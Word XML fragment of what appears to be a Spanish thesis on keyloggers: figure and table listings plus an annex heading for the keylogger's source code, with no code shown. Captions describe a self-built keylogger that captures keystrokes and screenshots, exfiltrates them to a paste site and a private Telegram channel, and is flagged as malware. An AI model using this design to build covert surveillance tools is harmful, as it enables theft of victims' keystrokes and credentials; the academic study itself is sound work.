            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>9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4" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 115. Muestra de monitor después de buscar keylogger y empezando a recibir datos.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358254 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>97</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5" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 116. Parámetros de línea de comandos del buscador y monitor del keylogger.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358255 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>9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6" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 117. Muestra de archivos de datos del keylogger y archivos de capturas de pantalla.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358256 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>98</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7" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 118. Parte del fichero de configuración de servicios, config.py</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358257 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>99</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8" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 119. Muestra de fichero enviado a pastecode.xyz</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358258 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>10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59" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 120. Esquema funcionamiento envío a Telegram</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358259 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>10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0" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 121. Muestra del canal privado de Telegram con capturas de pantalla y enlaces recibidos</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358260 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>101</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1" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 122. Muestra de keylogger funcionando sin ocultar consola y activados mensajes de depuración.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358261 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>10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2" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 123. Gráfico de llamadas entre funciones.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358262 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>10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3" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 124. Esquema del flujo general del keylogger.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358263 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>104</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4" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 125. Detección de demonseye.exe como malware.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358264 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>105</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5" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 126. Alerta de seguridad de Windows que aparece cuando un programa accede a la red.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358265 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>106</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6" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 127. Gráfica de Coste Temporal</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358266 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>110</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7" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 128. Tendencia de búsqueda del término «keylogger» desde sus inicios.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358267 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>112</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8" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 129. Tendencia de búsqueda del término «keylogger» en los últimos 12 meses.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358268 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>113</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DF019A" w:rsidRDefault="008400F5">
      <w:pPr>
        <w:pStyle w:val="Tabladeilustraciones"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc19358269" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 130. Muestra de teclado virtual en una operación bancaria.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358269 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>115</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">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337" w:name="_Toc273480999"/>
      <w:bookmarkStart w:id="338" w:name="__RefHeading___Toc1118_228935268"/>
      <w:bookmarkStart w:id="339" w:name="_Toc273538141"/>
      <w:bookmarkStart w:id="340" w:name="_Toc273546783"/>
      <w:bookmarkStart w:id="341" w:name="_Toc421702496"/>
      <w:bookmarkStart w:id="342" w:name="_Toc273461649"/>
      <w:bookmarkStart w:id="343" w:name="_Toc18453553"/>
      <w:bookmarkStart w:id="344" w:name="_Toc19810119"/>
      <w:r w:rsidRPr="00853E9A">
        <w:lastRenderedPageBreak/>
        <w:t>Índice de tablas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="337"/>
      <w:bookmarkEnd w:id="338"/>
      <w:bookmarkEnd w:id="339"/>
      <w:bookmarkEnd w:id="340"/>
      <w:bookmarkEnd w:id="341"/>
      <w:bookmarkEnd w:id="342"/>
      <w:bookmarkEnd w:id="343"/>
      <w:bookmarkEnd w:id="344"/>
    </w:p>
    <w:p w:rsidR="00E24312" w:rsidRDefault="00720EBB">
      <w:pPr>
        <w:pStyle w:val="Tabladeilustraciones"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> TOC \h \z \c "Tabla" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc19810125" w:history="1">
        <w:r w:rsidR="00E24312" w:rsidRPr="001F13EC">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Tabla 1. Comparativa keyloggers Hardware y Software</w:t>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810125 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>21</w:t>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E24312" w:rsidRDefault="00E24312">
      <w:pPr>
        <w:pStyle w:val="Tabladeilustraciones"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc19810126" w:history="1">
        <w:r w:rsidRPr="001F13EC">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Tabla 2. Resumen características keyloggers Hardware analizados.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810126 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>38</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E24312" w:rsidRDefault="00E24312">
      <w:pPr>
        <w:pStyle w:val="Tabladeilustraciones"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc19810127" w:history="1">
        <w:r w:rsidRPr="001F13EC">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Tabla 3. Comparativa de características de los keyloggers software analizados.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810127 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>45</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E24312" w:rsidRDefault="00E24312">
      <w:pPr>
        <w:pStyle w:val="Tabladeilustraciones"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc19810128" w:history="1">
        <w:r w:rsidRPr="001F13EC">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Tabla 4. Coste temporal en horas.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810128 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>110</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B029AB" w:rsidRDefault="00720EBB">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00824799" w:rsidRPr="00853E9A" w:rsidRDefault="00824799">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00746C6E" w:rsidRDefault="00746C6E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="DejaVu Sans" w:hAnsi="Arial" w:cs="DejaVu Sans"/>
          <w:kern w:val="3"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="345" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="345"/>
    </w:p>
    <w:p w:rsidR="00B029AB" w:rsidRDefault="00746C6E" w:rsidP="00746C6E">
      <w:pPr>
        <w:pStyle w:val="Titulo1NONUMERADO"/>
      </w:pPr>
      <w:bookmarkStart w:id="346" w:name="_Toc19810120"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Anexo</w:t>
      </w:r>
      <w:r w:rsidR="00B65D02">
        <w:t>s</w:t>
      </w:r>
      <w:bookmarkEnd w:id="346"/>
    </w:p>
    <w:p w:rsidR="00746C6E" w:rsidRPr="00BF3B1F" w:rsidRDefault="00895583" w:rsidP="00BF3B1F">
      <w:pPr>
        <w:pStyle w:val="Titulo2NONUMERADO"/>
        <w:rPr>
          <w:rStyle w:val="Ttulo2Car"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="347" w:name="_Toc19810121"/>
      <w:r w:rsidRPr="00BF3B1F">
        <w:rPr>
          <w:rStyle w:val="Ttulo2Car"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Código fuente del keylogger</w:t>
      </w:r>
      <w:bookmarkEnd w:id="347"/>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472EBD">
        <w:trPr>
          <w:divId w:val="901450420"/>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00472EBD" w:rsidRDefault="00472EBD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
